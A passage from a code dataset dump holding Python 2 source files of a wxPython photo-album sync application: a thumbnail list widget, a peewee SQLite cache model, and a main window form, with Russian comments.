BaseImage.__init__(self, owner, img_path)\r\n\r\n def LoadImage(self, w, h):\r\n return wx.Image(self.GetData())\r\n\r\n#------------------------------------------------------------------------------#\r\n\r\n\r\nmyEVT_ILC_IMAGE_SELECTED = wx.NewEventType()\r\nEVT_ILC_IMAGE_SELECTED = wx.PyEventBinder(myEVT_ILC_IMAGE_SELECTED, 1)\r\n\r\n\r\nclass ImageListCtrlEvent(wx.PyCommandEvent):\r\n def __init__(self, evtType, evtId):\r\n wx.PyCommandEvent.__init__(self, evtType, evtId)\r\n self.image = None\r\n\r\n def SetImage(self, image):\r\n self.image = image\r\n\r\n def GetImage(self):\r\n return self.image\r\n\r\n\r\nclass ImageListCtrl(wx.ScrolledWindow):\r\n \"\"\"Компонент предназначен для отображения списка миниатюр и дальнейшей работы с ними.\r\n Миниатюры имеют ленивую загрузку (по требованию), работает drag-n-dpor для\r\n перетаскивания миниатюр за пределы компонента.\r\n\r\n Миниатюра может быть представлена любым источником. Чтобы создать свой класс миниатюр,\r\n надо наследовать новый класс от BaseImage и переопределить в нем метод LoadImage,\r\n который отвечает за загрузку изображения из внешнего источника.\r\n \"\"\"\r\n\r\n class ImageOptions:\r\n def __init__(self):\r\n self.w = 0\r\n self.h = 0\r\n self.frame_color = wx.LIGHT_GREY\r\n self.selected_color = wx.BLUE\r\n\r\n def __init__(self, parent, id=wx.ID_ANY, pos=wx.DefaultPosition, size=wx.DefaultSize,\r\n twidth=120, theight=120):\r\n\r\n wx.ScrolledWindow.__init__(self, parent, id, pos, size)\r\n\r\n # Параметры изображений\r\n self.__img_opt = ImageListCtrl.ImageOptions()\r\n self.__cols = 0\r\n self.__rows = 0\r\n\r\n self.__items = []\r\n \"\"\"@type : list of BaseImage\"\"\"\r\n self.__selected = []\r\n \"\"\"@type : list of int\"\"\"\r\n\r\n self.SetThumbnailSize(twidth, theight)\r\n\r\n # Events\r\n self.Bind(wx.EVT_ERASE_BACKGROUND, lambda x: None)\r\n self.Bind(wx.EVT_PAINT, self.OnPaint)\r\n self.Bind(wx.EVT_SIZE, self.OnResize)\r\n # Mouse events\r\n self.Bind(wx.EVT_LEFT_DOWN, self.OnMouseDown)\r\n self.Bind(wx.EVT_MOTION, self.OnMouseMove)\r\n\r\n # self.Bind(wx.EVT_CHAR, lambda evt: evt.Skip())\r\n\r\n # ------------------------------------------------------------------------\r\n # Image manipulations\r\n\r\n @property\r\n def count(self):\r\n return len(self.__items)\r\n\r\n def Count(self):\r\n return self.count\r\n\r\n def Clear(self):\r\n \"\"\"\r\n Очистить компонент. Удаляет миниатюры и снимает выделение\r\n \"\"\"\r\n self.__items = []\r\n self.__selected = []\r\n self.UpdateColsAndRows()\r\n self.Refresh(False)\r\n\r\n def GetItems(self):\r\n \"\"\"\r\n @return: Список элементов компонента\r\n \"\"\"\r\n return self.__items\r\n\r\n def GetItemsData(self):\r\n \"\"\"\r\n @return: Список с данными каждого элемента компонента\r\n \"\"\"\r\n return [i.GetData() for i in self.__items]\r\n\r\n def IsSelected(self, index):\r\n \"\"\"\r\n @param index: номер элемента\r\n @return: Выделен ли элемент в данный момент\r\n \"\"\"\r\n return index in self.__selected\r\n\r\n def GetSelected(self):\r\n \"\"\"\r\n Список выделенных элементов\r\n \"\"\"\r\n return [self.__items[i] for i in self.__selected]\r\n\r\n def GetSelectedData(self):\r\n \"\"\"\r\n @return: Список с данными каждого выделенного элемента\r\n \"\"\"\r\n return [self.__items[i].GetData() for i in self.__selected]\r\n\r\n def GetSelectionIndex(self):\r\n \"\"\"\r\n @return: Номер первого выделенного элемента, None если ничего не выделено\r\n \"\"\"\r\n return self.__selected[0] if self.__selected else None\r\n\r\n def SetSelectionIndex(self, index):\r\n \"\"\"\r\n Установить элемент под индексом index выделенным\r\n \"\"\"\r\n if 0 > index >= self.count:\r\n raise IndexError()\r\n self.__selected = [index]\r\n\r\n def SetSelectedIndex(self, listOfIndexes):\r\n \"\"\"\r\n Установить выбранные елементы в соответствии со списком индексов\r\n \"\"\"\r\n for index in listOfIndexes:\r\n if not (0 <= index < self.count):\r\n raise IndexError('SetSelectionArray index out of range')\r\n self.__selected = listOfIndexes\r\n\r\n def Append(self, image):\r\n \"\"\"\r\n Добавить изображение в конец списка\r\n @type image: BaseImage\r\n \"\"\"\r\n image.owner = self\r\n self.__items.append(image)\r\n self.UpdateColsAndRows()\r\n self.Refresh(False)\r\n\r\n def AppendImages(self, images):\r\n \"\"\"\r\n Добавить список изображений в конец списка\r\n \"\"\"\r\n assert isinstance(images, list)\r\n for img in images:\r\n img.ownew = self\r\n self.__items.extend(images)\r\n self.UpdateColsAndRows()\r\n self.Refresh(False)\r\n\r\n def AssignImages(self, images):\r\n \"\"\"\r\n Заменить имеющийся набор миниатюр указанным списком\r\n @type images: iterable\r\n \"\"\"\r\n self.Clear()\r\n self.AppendImages(images)\r\n\r\n def Insert(self, pos, image):\r\n \"\"\"\r\n Вставить изображение в список миниатюр.\r\n Если указанная позиция меньше нуля, то изображение\r\n будет добавлено в конец списка.\r\n \"\"\"\r\n image.SetOwner(self)\r\n if 0 <= pos < self.count:\r\n self.__items.insert(pos, image)\r\n else:\r\n self.__items.append(image)\r\n self.UpdateColsAndRows()\r\n self.Refresh(False)\r\n\r\n def Remove(self, pos):\r\n \"\"\"\r\n Удалить изображение из списка\r\n \"\"\"\r\n self.__items[pos].owner = None\r\n self.__items.pop(pos)\r\n self.UpdateColsAndRows()\r\n self.Refresh(False)\r\n\r\n def LoadAll(self):\r\n \"\"\"\r\n Выполнить функцию Load() для всех элементов компонента\r\n \"\"\"\r\n for img in self.__items:\r\n img.Load()\r\n self.Refresh()\r\n\r\n # ------------------------------------------------------------------------\r\n\r\n # Manipulations with thumbnails size\r\n\r\n # todo сделать более точное определение координат (включая границы)\r\n def GetItemIndex(self, x, y):\r\n \"\"\"\r\n Получить индекс миниатюры по указанным координатам внутри компонента\r\n \"\"\"\r\n x /= self.__img_opt.w\r\n y /= self.__img_opt.h\r\n index = y * self.__cols + x\r\n if x < 0 or x >= self.__cols:\r\n return -1\r\n if y < 0 or y >= self.__rows:\r\n return -1\r\n if index < 0 or index >= self.count:\r\n return -1\r\n return index\r\n\r\n def SetThumbnailSize(self, width=0, height=0):\r\n \"\"\"\r\n Установить размер миниатюр и пересчитать количество строк и колонок\r\n \"\"\"\r\n if width > 0:\r\n self.__img_opt.w = width\r\n if height > 0:\r\n self.__img_opt.h = height\r\n self.SetScrollRate(width / 5, height / 5)\r\n self.UpdateColsAndRows()\r\n\r\n def GetImageWidth(self):\r\n \"\"\"\r\n Получить ширину миниатюры\r\n \"\"\"\r\n return self.__img_opt.w\r\n\r\n def GetImageHeight(self):\r\n \"\"\"\r\n Получить высоту миниатюры\r\n \"\"\"\r\n return self.__img_opt.h\r\n\r\n def UpdateColsAndRows(self):\r\n \"\"\"\r\n Пересчитать количество строк и столбцов\r\n \"\"\"\r\n # получить ширину клиентской области компонента\r\n cl_width = self.GetClientSize().GetWidth()\r\n # вычислить количество колонок\r\n self.__cols = cl_width // self.__img_opt.w or 1\r\n # вычислить количество столбцов\r\n rest = len(self.__items) % self.__cols # остаток: 1 строка\r\n self.__rows = len(self.__items) // self.__cols + bool(rest)\r\n self.SetVirtualSize((self.__cols * self.__img_opt.w, self.__rows * self.__img_opt.h))\r\n\r\n # ------------------------------------------------------------------------\r\n\r\n # Операции с цветовой палитрой\r\n\r\n def GetSelectionColour(self):\r\n return self.__img_opt.selected_color\r\n\r\n def SetSelectionColour(self, color):\r\n self.__img_opt.selected_color = color\r\n\r\n def GetFrameColour(self):\r\n return self.__img_opt.frame_color\r\n\r\n def SetFrameColour(self, color):\r\n self.__img_opt.frame_color = color\r\n\r\n # ------------------------------------------------------------------------\r\n\r\n # Отрисовка компонента\r\n\r\n def GetPaintRect(self):\r\n \"\"\"Получить видимый прямоугольник окна, который нужно отрисовать\"\"\"\r\n size = self.GetClientSize()\r\n paintRect = wx.Rect(0, 0, size.GetWidth(), size.GetHeight())\r\n # возвращает первую видимую точку в scroll units\r\n paintRect.x, paintRect.y = self.GetViewStart()\r\n xu, yu = self.GetScrollPixelsPerUnit()\r\n paintRect.x *= xu\r\n paintRect.y *= yu\r\n return paintRect\r\n\r\n def OnPaint(self, event):\r\n \"\"\"Метод обрабатывает событие отрисовки компонента\"\"\"\r\n # получить видимую область компонента,\r\n # на которой будет происходить рисование\r\n dc = wx.BufferedPaintDC(self)\r\n self.PrepareDC(dc)\r\n dc.BeginDrawing()\r\n\r\n dc.SetPen(wx.Pen(wx.BLACK, 0, wx.TRANSPARENT))\r\n dc.SetBrush(wx.Brush(self.GetBackgroundColour(), wx.SOLID))\r\n\r\n paintRect = self.GetPaintRect()\r\n dc.DrawRectangleRect(paintRect)\r\n\r\n for idx, img in enumerate(self.__items):\r\n # определяем координаты колонки и строки\r\n row = idx // self.__cols\r\n col = idx % self.__cols\r\n # определяем координаты миниатюры в пикселях (включая границы)\r\n tw = self.__img_opt.w # ширина\r\n th = self.__img_opt.h # высота\r\n tx = col * tw # координата X\r\n ty = row * th # координата Y\r\n # продолжить, если н пересекается с видимой областью\r\n # (а значит и рисовать ничего не надо)\r\n if not paintRect.Intersects(wx.Rect(tx, ty, tw, th)):\r\n continue\r\n # создадим пустое изображение-буфер, на котором будем рисовать\r\n # все компоненты миниатюры\r\n canvas = wx.EmptyBitmap(tw, th)\r\n img.Draw(canvas, tw, th, idx, self.IsSelected(idx))\r\n # self.Draw(idx, img, canvas, tw, th)\r\n dc.DrawBitmap(canvas, tx, ty)\r\n\r\n dc.EndDrawing()\r\n\r\n # ------------------------------------------------------------------------\r\n\r\n # Resizing\r\n\r\n def OnResize(self, event):\r\n # персчитать количество столбцов и строк\r\n self.UpdateColsAndRows()\r\n # обновить содержимое компонента\r\n self.Refresh(False)\r\n\r\n # ------------------------------------------------------------------------\r\n\r\n # Mouse events\r\n\r\n def OnMouseDown(self, event):\r\n def shift_select():\r\n first = self.__selected[0]\r\n if select < first:\r\n self.__selected = range(first, select - 1, -1)\r\n else:\r\n self.__selected = range(first, select + 1)\r\n\r\n x, y = self.CalcUnscrolledPosition(event.GetX(), event.GetY())\r\n select = self.GetItemIndex(x, y)\r\n\r\n sh = event.ShiftDown() # нажат шифт\r\n ct = event.ControlDown() # нажат контрол\r\n wt = select in self.__selected # выбранный элемент уже выделен\r\n gen_event = False\r\n\r\n # ничего не выбрано\r\n if select < 0:\r\n if not (sh or ct):\r\n self.__selected = []\r\n # новый элемент\r\n elif not wt:\r\n if not self.__selected:\r\n self.__selected = [select]\r\n elif ct:\r\n self.__selected.append(select)\r\n elif sh:\r\n shift_select()\r\n else:\r\n self.__selected = [select]\r\n gen_event = True\r\n # элемент уже был в списке\r\n else:\r\n if ct:\r\n self.__selected.remove(select)\r\n elif sh:\r\n shift_select()\r\n else:\r\n self.__selected = [select]\r\n\r\n # запускаем событие\r\n if gen_event:\r\n evt = ImageListCtrlEvent(myEVT_ILC_IMAGE_SELECTED, self.GetId())\r\n evt.SetInt(select)\r\n evt.SetImage(self.__items[select])\r\n self.GetEventHandler().ProcessEvent(evt)\r\n\r\n # обновляем компонент без перерисовки фона\r\n self.Refresh(False)\r\n self.SetFocus()\r\n\r\n def OnMouseMove(self, event):\r\n # if event.Dragging() and len(self._selectedarray):\r\n # text = ''\r\n # for i in self._selectedarray:\r\n # text = text + self._items[i].GetDnDText()\r\n #\r\n # text = wx.TextDataObject(text)\r\n # source = wx.DropSource(self)\r\n # source.SetData(text)\r\n # res = source.DoDragDrop()\r\n pass\r\n\r\n\r\n# -----------------------------------------------------------------------------\r\n\r\ndef main():\r\n app = wx.App(redirect=False)\r\n top = wx.Frame(None, title=\"Test ImageListCtrl\", size=(600, 400))\r\n top.ilc = ImageListCtrl(top)\r\n\r\n top.ilc.Append(LocalImage(top.ilc, r'D:\\Multimedia\\Photos\\test.jpg'))\r\n top.ilc.Append(LocalImage(top.ilc, r'D:\\Multimedia\\Photos\\test.jpg'))\r\n top.ilc.LoadAll()\r\n top.Show()\r\n app.MainLoop()\r\n\r\nif __name__ == '__main__':\r\n main()"
},
{
"alpha_fraction": 0.6148046851158142,
"alphanum_fraction": 0.6196024417877197,
"avg_line_length": 19.455883026123047,
"blob_id": "aa41b9baf98ef716171c09c5d431ea975a277a1a",
"content_id": "51bc303544241d8f23d0aca77c79fedc4d83f022",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1542,
"license_type": "no_license",
"max_line_length": 104,
"num_lines": 68,
"path": "/lib/models/cachedb.py",
"repo_name": "anwinged/phoebe",
"src_encoding": "UTF-8",
"text": "#! python\r\n#! coding: utf-8\r\n\r\n__author__ = 'Anton Vakhrushev'\r\n\r\n\r\nfrom peewee import *\r\n\r\n\r\ndatabase = SqliteDatabase(None)\r\n\r\n\r\nclass BaseModel(Model):\r\n class Meta:\r\n database = database\r\n\r\n\r\nclass Photo(BaseModel):\r\n sid = CharField(unique=True)\r\n remote = BooleanField()\r\n viewed = DateTimeField()\r\n modified = DateTimeField()\r\n width = IntegerField(default=0)\r\n height = IntegerField(default=0)\r\n ratio = FloatField(null=True)\r\n\r\n\r\nclass Image(BaseModel):\r\n photo = ForeignKeyField(Photo, related_name='images', on_delete='cascade', on_update='cascade')\r\n link = CharField(max_length=1024, unique=True)\r\n data = BlobField()\r\n viewed = DateTimeField()\r\n\r\n\r\nclass HashValue(BaseModel):\r\n photo = ForeignKeyField(Photo, related_name='hash_values', on_delete='cascade', on_update='cascade')\r\n sort = IntegerField()\r\n value = FloatField()\r\n\r\n\r\ndef close():\r\n \"\"\"\r\n Если база данных была открыта, то закрывает ее\r\n \"\"\"\r\n if not database.is_closed():\r\n database.close()\r\n\r\n\r\ndef connect(dbname=':memory:'):\r\n \"\"\"\r\n Соединиться с базой данных\r\n @param dbname: имя базы данных\r\n @return: база днных\r\n \"\"\"\r\n close()\r\n database.init(dbname)\r\n database.connect()\r\n database.create_tables([Photo, Image, HashValue], safe=True)\r\n return database\r\n\r\n\r\ndef transaction():\r\n return database.transaction()\r\n\r\n\r\nif __name__ == '__main__':\r\n connect('test.db')\r\n close()\r\n"
},
{
"alpha_fraction": 0.5807169675827026,
"alphanum_fraction": 0.5860257744789124,
"avg_line_length": 37.904327392578125,
"blob_id": "e4a719c24a557a413d646a2316da22abeca7e875",
"content_id": "63a146d0d42e79d7a6c7089eab6dd1ef29119e55",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 18022,
"license_type": "no_license",
"max_line_length": 104,
"num_lines": 439,
"path": "/lib/forms/overviewfrm.py",
"repo_name": "anwinged/phoebe",
"src_encoding": "UTF-8",
"text": "#! python\r\n# -*- coding: utf-8 -*-\r\n\r\n__author__ = 'Anton Vakhrushev'\r\n\r\n\r\nimport wx\r\nimport datetime\r\nimport wx.lib.agw.aui as wxaui\r\nfrom lib.widgets import imglistctrl\r\nfrom lib.controllers import progressctr\r\nfrom lib.extra import utils\r\n\r\n\r\nclass PhotoImage(imglistctrl.BaseImage):\r\n\r\n ICONS = {}\r\n\r\n def __init__(self, owner, photo):\r\n \"\"\"\r\n @type photo: photo.MatchedPhoto\r\n \"\"\"\r\n imglistctrl.BaseImage.__init__(self, owner, photo)\r\n if not self.ICONS:\r\n self.ICONS = {\r\n 'PHOTO_YANDEX': wx.Bitmap('share/picture.png'),\r\n 'PHOTO_LOCAL': wx.Bitmap('share/picture_add.png'),\r\n 'PHOTO_MATCHED': wx.Bitmap('share/picture_link.png'),\r\n 'PHOTO_EDITED': wx.Bitmap('share/picture_edit.png'),\r\n 'PHOTO_ERROR': wx.Bitmap('share/picture_error.png'),\r\n }\r\n\r\n def LoadImage(self, w, h):\r\n return self.data.wximage(w, h)\r\n\r\n def DrawBadges(self, dc, width, height, index, selected):\r\n badges = []\r\n if self.data.is_edited():\r\n badges.append(self.ICONS['PHOTO_EDITED'])\r\n elif self.data.is_matched():\r\n badges.append(self.ICONS['PHOTO_MATCHED'])\r\n elif self.data.is_local():\r\n size = self.data.size / 1024.0 / 1024.0 if self.data.size else None\r\n if size > 20:\r\n badges.append(self.ICONS['PHOTO_ERROR'])\r\n else:\r\n badges.append(self.ICONS['PHOTO_LOCAL'])\r\n else:\r\n badges.append(self.ICONS['PHOTO_YANDEX'])\r\n\r\n fx, fy, fw, fh = self.GetFrameRect(width, height)\r\n for index, badge in enumerate(badges):\r\n margin = 5 + 21 * index\r\n dc.DrawBitmap(badge, fx + margin, fy + fh - 21)\r\n\r\n\r\nclass IconStorage:\r\n def __init__(self):\r\n self.imageList = wx.ImageList(16, 16)\r\n self.YANDEX_FOTKI = self.imageList.Add(wx.Bitmap('share/yandex_fotki.png'))\r\n self.PHOTOS = self.imageList.Add(wx.Bitmap('share/photos.png'))\r\n self.ALBUM_YANDEX = self.imageList.Add(wx.Bitmap('share/folder_picture.png'))\r\n self.ALBUM_LOCAL = self.imageList.Add(wx.Bitmap('share/folder_add.png'))\r\n self.ALBUM_MATCHED = self.imageList.Add(wx.Bitmap('share/folder_link.png'))\r\n self.ALBUM_SYNCED = self.imageList.Add(wx.Bitmap('share/folder_search.png'))\r\n self.ALBUM_EDITED = self.imageList.Add(wx.Bitmap('share/folder_green.png'))\r\n self.PHOTO_YANDEX = self.imageList.Add(wx.Bitmap('share/photo.png'))\r\n self.PHOTO_LOCAL = self.imageList.Add(wx.Bitmap('share/photo_add.png'))\r\n self.PHOTO_MATCHED = self.imageList.Add(wx.Bitmap('share/photo_link.png'))\r\n\r\n def GetIcon(self, index):\r\n return self.imageList.GetIcon(index)\r\n\r\n\r\nclass IdStorage:\r\n def __init__(self):\r\n self.ID_LOG_IN = wx.NewId()\r\n self.ID_MENU_FILE_OPEN = wx.NewId()\r\n self.ID_MENU_UPLOAD = wx.NewId()\r\n self.ID_OPEN_SELECTED_PHOTO = wx.NewId()\r\n self.ID_DELETE_SELECTED_PHOTO = wx.NewId()\r\n self.ID_ALBUMS_REFRESH = wx.NewId()\r\n self.ID_ALBUM_CREATE = wx.NewId()\r\n self.ID_ALBUM_RENAME = wx.NewId()\r\n self.ID_ALBUM_SETTINGS = wx.NewId()\r\n self.ID_CURRENT_ALBUM_DELETE = wx.NewId()\r\n self.ID_CURRENT_ALBUM_UPLOAD = wx.NewId()\r\n self.ID_PHOTO_UPLOAD = wx.NewId()\r\n\r\n\r\nclass FindSuccessful(Exception):\r\n def __init__(self, item_id):\r\n self.item_id = item_id\r\n\r\n\r\nclass OverviewForm(wx.Frame):\r\n def __init__(self, controller, title):\r\n \"\"\"\r\n Главная форма\r\n \"\"\"\r\n wx.Frame.__init__(self, None, wx.NewId(), title, size=(1100, 750))\r\n\r\n self.title = title\r\n self.controller = controller\r\n \"\"\"@type : OverviewController\"\"\"\r\n self.icons = IconStorage()\r\n self.ids = IdStorage()\r\n self.current_album_id = None\r\n self.current_album_item_id = None\r\n self.selected_album_id = None\r\n\r\n menubar = wx.MenuBar()\r\n menu = wx.Menu()\r\n menu.Append(self.ids.ID_LOG_IN, u\"&Войти\\tCtrl+L\")\r\n menubar.Append(menu, u'&Сервис')\r\n menu = wx.Menu()\r\n menu.Append(self.ids.ID_ALBUMS_REFRESH, u\"Обновить все\\tCtrl+R\")\r\n menu.Append(self.ids.ID_CURRENT_ALBUM_UPLOAD, u\"Загрузить\\tCtrl+U\")\r\n menu.Append(self.ids.ID_CURRENT_ALBUM_DELETE, u\"Удалить\\tCtrl+D\")\r\n menubar.Append(menu, u'Альбом')\r\n menu = wx.Menu()\r\n menu.Append(self.ids.ID_OPEN_SELECTED_PHOTO, u\"&Просмотр\\tF12\")\r\n menubar.Append(menu, u'&Фотография')\r\n self.SetMenuBar(menubar)\r\n\r\n # aui manager\r\n self.auimgr = wxaui.AuiManager()\r\n self.auimgr.SetManagedWindow(self)\r\n self.auimgr.GetArtProvider().SetMetric(wxaui.AUI_DOCKART_SASH_SIZE, 3)\r\n # album tree\r\n self.albumTree = wx.TreeCtrl(self, size=(300, -1))\r\n self.albumTree.SetImageList(self.icons.imageList)\r\n self.auimgr.AddPane(self.albumTree,\r\n wxaui.AuiPaneInfo().Name('albumTree').Left().Layer(1)\r\n .CloseButton(False).CaptionVisible(False))\r\n # image list\r\n self.thumbs = imglistctrl.ImageListCtrl(self)\r\n self.thumbs.SetBackgroundColour('#505050')\r\n self.thumbs.SetSelectionColour('#e5da29')\r\n self.thumbs.SetThumbnailSize(180, 180)\r\n self.auimgr.AddPane(self.thumbs,\r\n wxaui.AuiPaneInfo().Name(\"thumbs\").CenterPane().Position(1))\r\n self.auimgr.Update()\r\n\r\n self.SetIcon(self.icons.GetIcon(self.icons.YANDEX_FOTKI))\r\n self.SetSizeHintsSz(wx.DefaultSize, wx.DefaultSize)\r\n\r\n sbar = wx.StatusBar(self)\r\n fields = [150, 150, 600] # login, photos, actions\r\n sbar.SetFieldsCount(len(fields))\r\n sbar.SetStatusWidths(fields)\r\n self.SetStatusBar(sbar)\r\n\r\n self.Bind(wx.EVT_CLOSE, self.OnClose)\r\n self.Bind(wx.EVT_MENU, self.OnLogin, id=self.ids.ID_LOG_IN)\r\n self.Bind(wx.EVT_MENU, self.OnAlbumsRefresh, id=self.ids.ID_ALBUMS_REFRESH)\r\n self.Bind(wx.EVT_MENU, self.OnAlbumCreate, id=self.ids.ID_ALBUM_CREATE)\r\n self.Bind(wx.EVT_MENU, self.OnAlbumSettings, id=self.ids.ID_ALBUM_SETTINGS)\r\n self.Bind(wx.EVT_MENU, self.OnDeleteCurrentAlbum, id=self.ids.ID_CURRENT_ALBUM_DELETE)\r\n self.Bind(wx.EVT_MENU, self.OnUploadCurrentAlbum, id=self.ids.ID_CURRENT_ALBUM_UPLOAD)\r\n self.Bind(wx.EVT_MENU, self.OnOpenPhoto, id=self.ids.ID_OPEN_SELECTED_PHOTO)\r\n\r\n self.thumbs.Bind(wx.EVT_KEY_DOWN, self.OnChar)\r\n self.thumbs.Bind(wx.EVT_LEFT_DCLICK, self.OnOpenPhoto)\r\n self.thumbs.Bind(imglistctrl.EVT_ILC_IMAGE_SELECTED, self.OnImageSelected)\r\n self.albumTree.Bind(wx.EVT_TREE_SEL_CHANGED, self.OnAlbumTreeSelectionChanged)\r\n self.albumTree.Bind(wx.EVT_TREE_ITEM_MENU, self.OnAlbumTreeContextMenu)\r\n self.albumTree.Bind(wx.EVT_TREE_ITEM_ACTIVATED, self.OnAlbumSelected)\r\n\r\n # События формы ------------------------------------------------------------\r\n\r\n def OnClose(self, event):\r\n self.controller.exit()\r\n self.Destroy()\r\n\r\n def OnImageSelected(self, evt):\r\n img = evt.GetImage()\r\n selected = self.thumbs.GetSelected()\r\n if len(selected) == 1:\r\n ph = selected[0].data\r\n size = round(ph.size / 1024.0 / 1024.0, 2) if ph.size else '??'\r\n self.SetStatusText(u'Фотография \"{}\", размер {} MB'.format(ph.title, size), 2)\r\n if len(selected) == 2:\r\n diff = selected[0].data.similar_to(selected[1].data)\r\n self.SetStatusText(u'Разность: {}'.format(diff), 2)\r\n\r\n def OnChar(self, evt):\r\n keycode = evt.GetKeyCode()\r\n if keycode == wx.WXK_RETURN:\r\n self.OpenSelectedPhoto()\r\n if keycode == ord('X'):\r\n self.controller.copy_photo_links(self.thumbs.GetSelectedData())\r\n if keycode == ord('C'):\r\n keycode = ord('1')\r\n keycode -= ord('0')\r\n if evt.GetModifiers() == wx.MOD_CONTROL and keycode in range(1, 10):\r\n self.controller.copy_photos(self.thumbs.GetSelectedData(), keycode)\r\n\r\n def OnAlbumTreeSelectionChanged(self, event):\r\n item_id = event.GetItem()\r\n album = self.albumTree.GetPyData(item_id)\r\n self.selected_album_id = album.id\r\n print album.id\r\n\r\n def OnAlbumTreeContextMenu(self, event):\r\n item_id = event.GetItem()\r\n self.albumTree.SelectItem(item_id)\r\n albumMenu = wx.Menu()\r\n # albumMenu.Append(self.ids.ID_ALBUM_CREATE, u'Новый')\r\n # albumMenu.Append(self.ids.ID_ALBUM_DELETE, u'Удалить')\r\n # albumMenu.Append(self.ids.ID_ALBUM_UPLOAD, u'Загрузить')\r\n albumMenu.Append(self.ids.ID_ALBUM_SETTINGS, u'Настройки')\r\n self.albumTree.PopupMenu(albumMenu)\r\n albumMenu.Destroy()\r\n\r\n def OnAlbumSelected(self, event):\r\n \"\"\"При выборе альбома\"\"\"\r\n item_id = event.GetItem()\r\n album = self.albumTree.GetPyData(item_id)\r\n self.controller.load_album(album)\r\n self.current_album_id = album.id\r\n self.current_album_item_id = item_id\r\n\r\n def OnLogin(self, event):\r\n self.controller.login()\r\n\r\n def OnUpload(self, event):\r\n pass\r\n\r\n def OnOpenPhoto(self, event):\r\n photos = self.thumbs.GetItemsData()\r\n index = self.thumbs.GetSelectionIndex()\r\n self.controller.open_photo(photos, index)\r\n\r\n def OnDeletePhoto(self, event):\r\n f = lambda p: p.data.delete()\r\n self.ForEachSelected(f, u'Удалить фотографии?')\r\n\r\n def OnSmartSyncSettings(self, event):\r\n self.OpenSmartSyncSettings()\r\n\r\n def OnAlbumsRefresh(self, event):\r\n self.controller.refresh_albums()\r\n\r\n def OnAlbumCreate(self, event):\r\n self.CreateAlbumInSelected()\r\n\r\n def OnDeleteCurrentAlbum(self, event):\r\n album = self.albumTree.GetPyData(self.current_album_item_id)\r\n self.controller.delete_album(album)\r\n\r\n def OnUploadCurrentAlbum(self, event):\r\n album = self.albumTree.GetPyData(self.current_album_item_id)\r\n self.controller.upload_album(album)\r\n\r\n def OnAlbumSettings(self, event):\r\n item_id = self.albumTree.GetSelection()\r\n album = self.albumTree.GetPyData(item_id)\r\n self.controller.album_settings(album)\r\n\r\n def OnUploadPhoto(self, event):\r\n self.UploadSelectedPhoto()\r\n\r\n # Функции старта и окончания работы приложения -----------------------------\r\n\r\n def ClearAll(self):\r\n self.SetTitle(self.title)\r\n self.albumTree.DeleteAllItems()\r\n self.thumbs.Clear()\r\n\r\n def SetCurrentAlbum(self, album):\r\n self.current_album_id = album.id\r\n self.current_album_item_id = self.FindAlbumItemId(album.id)\r\n\r\n def GetCurrentAlbum(self):\r\n album = self.albumTree.GetPyData(self.current_album_item_id)\r\n return self.current_album_item_id, album\r\n\r\n def ShowAlbumTree(self, root_album):\r\n \"\"\"\r\n Выводит предварительно созданное дерево альбомов\r\n \"\"\"\r\n def process(item_id, album):\r\n children = sorted(album.children, key=lambda a: a.title)\r\n for child in children:\r\n child_id = self.AppendAlbum(item_id, child)\r\n process(child_id, child)\r\n\r\n if not root_album:\r\n return\r\n self.albumTree.DeleteAllItems()\r\n root_id = self.albumTree.AddRoot(root_album.title)\r\n self.albumTree.SetPyData(root_id, root_album)\r\n self.albumTree.SetItemImage(root_id, self.icons.PHOTOS)\r\n process(root_id, root_album)\r\n self.albumTree.Expand(root_id)\r\n\r\n def ShowPhotos(self, photos, progress=None):\r\n\r\n def process_photo(photo):\r\n photo_image = PhotoImage(self.thumbs, photo)\r\n photo_image.Load()\r\n return photo_image\r\n\r\n key = lambda p: p.get_capture_time() or datetime.datetime(2000, 1, 1)\r\n photos = sorted(photos, key=key)\r\n progress = progressctr.Progress.cover(progress)\r\n photo_image_list = list(progress.map(process_photo, photos, title=u'Создаем миниатюры',\r\n message=lambda i, x: x.title))\r\n self.thumbs.AssignImages(photo_image_list)\r\n self.thumbs.Refresh()\r\n\r\n def GetSelectedAlbum(self):\r\n item_id = self.albumTree.GetSelection()\r\n return item_id, self.albumTree.GetPyData(item_id)\r\n\r\n def GetSelectedPhotos(self):\r\n return self.thumbs.GetSelected()\r\n\r\n def AppendAlbum(self, root_id, album):\r\n # задаем название\r\n item_id = self.albumTree.AppendItem(root_id, u'')\r\n self.albumTree.SetPyData(item_id, album)\r\n self.UpdateAlbumItem(item_id, album)\r\n return item_id\r\n\r\n def FindAlbumItemId(self, album_id):\r\n def WalkAlbumTree(node_id):\r\n data = self.albumTree.GetPyData(node_id)\r\n if data.id == album_id:\r\n raise FindSuccessful(node_id)\r\n child_id, cookie = self.albumTree.GetFirstChild(node_id)\r\n while child_id.IsOk():\r\n WalkAlbumTree(child_id)\r\n child_id, cookie = self.albumTree.GetNextChild(node_id, cookie)\r\n try:\r\n WalkAlbumTree(self.albumTree.GetRootItem())\r\n return None\r\n except FindSuccessful as exc:\r\n return exc.item_id\r\n\r\n def UpdateAlbumItem(self, item_id, album):\r\n \"\"\"\r\n @type album: PhotoAlbum\r\n \"\"\"\r\n title = unicode(album.title)\r\n if album.is_synced():\r\n self.albumTree.SetItemImage(item_id, self.icons.ALBUM_SYNCED)\r\n elif album.is_matched():\r\n if not album.children:\r\n title += u' ({}/{})'.format(album.count_remote(), album.count_local())\r\n if album.is_edited():\r\n self.albumTree.SetItemImage(item_id, self.icons.ALBUM_EDITED)\r\n else:\r\n self.albumTree.SetItemImage(item_id, self.icons.ALBUM_MATCHED)\r\n elif album.is_local():\r\n title += u' ({})'.format(album.count_local())\r\n self.albumTree.SetItemImage(item_id, self.icons.ALBUM_LOCAL)\r\n else:\r\n if not album.children:\r\n title += u' ({})'.format(album.count_remote())\r\n self.albumTree.SetItemImage(item_id, self.icons.ALBUM_YANDEX)\r\n self.albumTree.SetItemText(item_id, title)\r\n\r\n def UpdateAlbumView(self, album):\r\n item_id = self.FindAlbumItemId(album.id)\r\n if item_id:\r\n self.UpdateAlbumItem(item_id, album)\r\n\r\n def ReselectAlbum(self):\r\n if not self.selected_album_id:\r\n return\r\n item_id = self.FindAlbumItemId(self.selected_album_id)\r\n if item_id:\r\n self.albumTree.SelectItem(item_id)\r\n return\r\n item_id = self.FindAlbumItemId(self.current_album_id)\r\n if item_id:\r\n self.albumTree.SelectItem(item_id)\r\n\r\n # -------------------------------------------------------------------------\r\n\r\n def 